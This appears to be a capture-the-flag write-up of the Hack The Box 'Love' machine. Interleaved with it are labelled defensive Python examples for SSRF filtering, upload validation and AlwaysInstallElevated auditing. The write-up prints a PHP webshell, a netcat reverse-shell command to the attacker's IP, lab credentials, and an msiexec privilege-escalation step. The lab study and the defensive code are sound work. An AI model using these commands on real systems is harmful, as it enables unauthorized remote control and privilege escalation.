HTB - Love
Easy Machine
Enumeration
As always, we start with our nmap command:
nmap -p- --open -sCV -sS --min-rate 5000 -n -Pn -vvv 10.10.10.239 -oN Targeted
Web page shows a voting system from

Enumerating subdomains, we find "staging":
wfuzz -c -t 200 --hc=404 --hh=4388 -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.love.htb" love.htb
In this subdomain I find an input where you have to enter a URL. Doing some tests, I see that I get a response on my Responder:

tcpdump -i tun0

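The URL input on the staging host reaches out to whatever address it is given, which is why the request shows up on the attacker's listener. As an added example (not code from the write-up or from the voting application), this is the server-side check a defender would put in front of such a feature: only http/https, no embedded credentials, and every address the hostname resolves to must be public. The hostnames and IPs in the lookup table are constructed so the block runs offline; `system_resolve` is what you would pass in production.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(ip_text):
    """True only for globally routable unicast addresses (IPv4 or IPv6)."""
    ip = ipaddress.ip_address(ip_text)
    return not (
        ip.is_private or ip.is_loopback or ip.is_link_local
        or ip.is_multicast or ip.is_reserved or ip.is_unspecified
    )


def system_resolve(host):
    """Production resolver: every address the name currently maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_fetch_url(url, resolve=system_resolve):
    """Return (ok, reason) for a user-supplied URL the server is asked to fetch.

    Rejects non-HTTP schemes, embedded credentials, and any hostname that
    resolves to a private, loopback, link-local or otherwise non-public address.
    """
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parsed.username is not None or parsed.password is not None:
        return False, "credentials in URL"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = resolve(host)
    except OSError:  # socket.gaierror is a subclass of OSError
        return False, "unresolvable host"
    if not addresses:
        return False, "unresolvable host"
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


# Constructed lookup table so the example runs offline; not real DNS data.
CONSTRUCTED_DNS = {
    "public.example": ["93.184.216.34"],
    "cloud-metadata.example": ["169.254.169.254"],
    "intranet.example": ["10.0.0.5", "93.184.216.35"],  # dual-homed: still rejected
}


def constructed_resolve(host):
    """Offline stand-in for system_resolve using the table above."""
    try:
        ipaddress.ip_address(host)  # IP literal: return it unchanged
        return [host]
    except ValueError:
        pass
    if host not in CONSTRUCTED_DNS:
        raise socket.gaierror("constructed NXDOMAIN")
    return CONSTRUCTED_DNS[host]


if __name__ == "__main__":
    for candidate in ("http://public.example/vote", "http://10.10.14.11/",
                      "http://cloud-metadata.example/latest", "file:///etc/passwd"):
        print(candidate, "->", validate_fetch_url(candidate, constructed_resolve))
```

Validating the name once is not enough on its own: the HTTP client should connect to the address that passed the check rather than resolving the name a second time (DNS rebinding), and redirects should be either disabled or re-validated per hop.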
I couldn't move forward from here; however, I tried the other ports the machine had open according to my nmap scan (5000, 5986).
Scanning port 5000 shows something interesting:

Getting some creds:
admin:@LoveIsInTheAir!!!!
Now we can go back and log into /admin/login.php of the Voting System web page.

Investigating the web app, I discover that I can create voters, and the voter photo upload does not filter PHP files, so I crafted a malicious PHP file and created my fake voter:
<?php system($_REQUEST['cmd']); ?>

Now, in the images directory, I can find my PHP file.
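The photo field accepted a .php file and stored it under a web-served directory with its original name, which is the whole bug. As an added example (not code from the write-up or the voting application), this is the validation a defender would apply to that upload: an extension allowlist, no double extensions, a size cap, a magic-bytes check against the claimed image type, and a server-chosen random filename. The PNG sample and the upload directory name are constructed for the example.

```python
import os
import secrets

# Extension allowlist and the magic bytes each type must start with.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024


def validate_photo(original_name, content):
    """Return (ok, reason) for an uploaded voter photo."""
    # Strip any directory component the client supplied (either separator).
    base = os.path.basename(original_name.replace("\\", "/"))
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    if "." in root:  # e.g. shell.php.png
        return False, "multiple extensions not allowed"
    if not content:
        return False, "empty file"
    if len(content) > MAX_BYTES:
        return False, "file too large"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match claimed image type"
    return True, "ok"


def storage_name(original_name):
    """Random server-chosen filename; only the (validated) extension survives."""
    ext = os.path.splitext(original_name)[1].lower()
    return secrets.token_hex(16) + ext


def store_photo(original_name, content, upload_dir):
    """Validate, then write under a random name. Raises ValueError on rejection."""
    ok, reason = validate_photo(original_name, content)
    if not ok:
        raise ValueError(reason)
    name = storage_name(original_name)
    os.makedirs(upload_dir, exist_ok=True)
    with open(os.path.join(upload_dir, name), "wb") as fh:
        fh.write(content)
    return name


# Constructed inputs: a bare PNG header, and the webshell payload from the write-up.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
WEBSHELL = b"<?php system($_REQUEST['cmd']); ?>"

if __name__ == "__main__":
    for name, data in (("photo.png", PNG_SAMPLE), ("shell.php", WEBSHELL),
                       ("shell.php.png", WEBSHELL), ("shell.png", WEBSHELL)):
        print(name, "->", validate_photo(name, data))
```

The magic-bytes check stops the plain webshell but not a polyglot that begins with a valid image header and carries PHP later in the file; what closes that gap is the random filename with a fixed image extension plus serving the upload directory with script execution disabled, so that nothing stored there is ever handed to the PHP interpreter.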

Shell as Phoebe
Using the PHP webshell we created previously, I just send an nc connection back to my host:
http://love.htb/images/shell.php?cmd=nc -e cmd 10.10.14.11 443

Shell as System
For System enumeration I decided to upload winPEAS.


Searching for some weak points in the output, I find that:
AlwaysInstallElevated = 1
Now we just need to create an msfvenom payload and abuse this feature.

After uploading, we use this msiexec command to gain our shell
msiexec /quiet /qn /i reverse.msi
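The winPEAS hit above is the `AlwaysInstallElevated` Windows Installer policy, which makes msiexec run any package as SYSTEM. It only takes effect when the value is 1 in both HKLM and HKCU, so an audit has to read both hives. As an added example (not from the write-up or winPEAS), this checks the policy with an injectable reader: the real reader uses `winreg` and only works on Windows, while the constructed reader lets the logic run anywhere.

```python
POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"


def read_registry_value(hive, subkey, name):
    """Windows-only reader: returns the value, or None if the key/value is absent."""
    import winreg  # only importable on Windows

    roots = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    try:
        with winreg.OpenKey(roots[hive], subkey) as key:
            value, _value_type = winreg.QueryValueEx(key, name)
            return value
    except FileNotFoundError:
        return None


def always_install_elevated_status(read=read_registry_value):
    """Return (effective, values).

    The policy is effective only when BOTH hives hold 1. One hive set on its
    own is still worth flagging: the other half can be supplied later.
    """
    values = {hive: read(hive, POLICY_KEY, VALUE_NAME) for hive in ("HKLM", "HKCU")}
    effective = values["HKLM"] == 1 and values["HKCU"] == 1
    return effective, values


def findings(values):
    """Human-readable audit lines for the values returned above."""
    lines = []
    for hive, value in values.items():
        if value == 1:
            lines.append(f"{hive}\\{POLICY_KEY}\\{VALUE_NAME} = 1 (remove or set to 0)")
    if not lines:
        lines.append("AlwaysInstallElevated not set in either hive")
    return lines


def make_constructed_reader(table):
    """Offline stand-in for read_registry_value; `table` maps hive -> value or None."""
    def read(hive, subkey, name):
        if subkey != POLICY_KEY or name != VALUE_NAME:
            return None
        return table.get(hive)
    return read


if __name__ == "__main__":
    # Constructed state mirroring the write-up: the policy is on in both hives.
    effective, values = always_install_elevated_status(
        make_constructed_reader({"HKLM": 1, "HKCU": 1}))
    print("effective:", effective)
    for line in findings(values):
        print(" -", line)
```

On a real host, call `always_install_elevated_status()` with no arguments to read the live registry; the same path is where the setting is removed to remediate.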

That was all for today's write up, hope you've enjoyed it.
I will be uploading a new write up every weekend, so don't forget to stay tuned to the blog 😄
You can use my social media to leave me your thoughts about the write ups 👍
Twitter: https://twitter.com/KrakenEU_
Linkedin: https://www.linkedin.com/in/i%C3%B1aki-tornos-572580177/
Github: https://github.com/KrakenEU/